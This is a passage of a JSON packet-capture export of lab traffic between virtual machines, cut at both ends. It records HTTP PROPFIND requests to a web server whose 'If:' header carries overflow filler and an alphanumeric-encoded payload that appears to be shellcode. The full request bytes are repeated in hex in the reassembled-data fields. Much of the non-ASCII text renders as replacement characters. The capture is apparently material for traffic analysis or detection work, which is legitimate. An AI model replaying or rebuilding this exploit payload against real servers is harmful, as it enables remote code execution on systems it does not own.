BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "327"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.791903000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.791903000",
|
||
"frame.time_delta": "0.000005000",
|
||
"frame.time_delta_displayed": "0.003894000",
|
||
"frame.time_relative": "17.042843000",
|
||
"frame.number": "334",
|
||
"frame.len": "311",
|
||
"frame.cap_len": "311",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "297",
|
||
"ip.id": "0x00006df3",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000c274",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "34351",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "34351",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "55",
|
||
"tcp.len": "245",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1016494143",
|
||
"tcp.nxtseq": "1694",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3845135100",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x000096e9",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:37:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:37:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868599",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000345000",
|
||
"tcp.analysis.bytes_in_flight": "1693",
|
||
"tcp.analysis.push_bytes_sent": "1693"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000654000",
|
||
"tcp.time_delta": "0.000005000"
|
||
},
|
||
"tcp.payload": "52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "333",
|
||
"tcp.segment": "334",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1693",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:50:69:6a:59:4f:63:43:56:4c:43:58:4d:5a:4c:42:78:6a:4a:59:4d:49:70:74:72:7a:79:76:63:6a:58:77:70:54:4a:43:48:51:56:77:43:48:55:64:7a:47:46:6f:54:4b:72:53:63:46:6a:50:53:57:53:44:51:54:4c:6c:76:75:4b:75:74:6f:78:59:73:6b:7a:6b:49:57:52:52:4f:49:6c:55:75:46:57:7a:52:59:65:54:e4:8d:92:e4:91:95:e5:8d:91:e6:bd:b8:e6:89:a7:e4:91:ab:e6:b5:86:e5:81:ac:e4:b9:b2:e4:b1:8a:e5:a1:b5:e7:81:98:e4:bd:ab:e5:a5:88:e4:ad:b7:e5:a5:b8:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:89:96:e6:95:b8:e4:b9:83:e4:8d:88:e4:a5:a8:e4:a9:82:e6:a5:b1:e4:95:a1:e7:a1:8b:e4:91:99:e6:b1:a1:e7:a5:ad:e5:95:91:e6:b9:b5:e7:9d:b8:e6:a5:87:e5:8d:96:e6:b9:b4:e6:b5:b5:e5:99:97:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:41:42:5a:59:4f:66:65:45:56:42:4c:47:70:47:4a:54:70:71:6c:69:70:7a:45:73:71:55:51:63:52:6a:49:61:48:64:52:72:5a:46:57:59:57:4b:55:42:71:6b:42:6e:4b:52:62:7a:51:4a:73:6a:75:49:63:45:58:45:70:64:4a:4e:72:71:74:4a:68:46:41:55:5a:44:59:67:62:46:6b:4d:7a:6e:57:6d:4a:4b:51:75:67:e7:8d:ae:e5:a5:8d:e7:91:96:e6:91:b3:e7:91:94:e6:8d:91:e6:ad:94:e4:89:a8:e5:a1:88:e4:a9:b0:e4:ad:b3:e6:95:a9:e6:8d:aa:e6:bd:84:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:99:a3:e4:ad:8e:e7:a9:a7:e4:b9:a2:e1:8f:80:e6:a0:83:e5:91:81:e4:8d:ad:e7:a1:8a:e5:8d:b4:e6:ad:90:e7:81:b5:e6:bd:a8:e7:85:b2:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/PijYOcCVLCXMZLBxjJYMIptrzyvcjXwpTJCHQVwCHUdzGFoTKrScFjPSWSDQTLlvuKutoxYskzkIWRROIlUuFWzRYeT<65><54><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/ABZYOfeEVBLGpGJTpqlipzEsqUQcRjIaHdRrZFWYWKUBqkBnKRbzQJsjuIcEXEpdJNrqtJhFAUZDYgbFkMznWmJKQug<75><67><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "336"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.795958000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.795958000",
|
||
"frame.time_delta": "0.000044000",
|
||
"frame.time_delta_displayed": "0.004055000",
|
||
"frame.time_relative": "17.046898000",
|
||
"frame.number": "343",
|
||
"frame.len": "309",
|
||
"frame.cap_len": "309",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
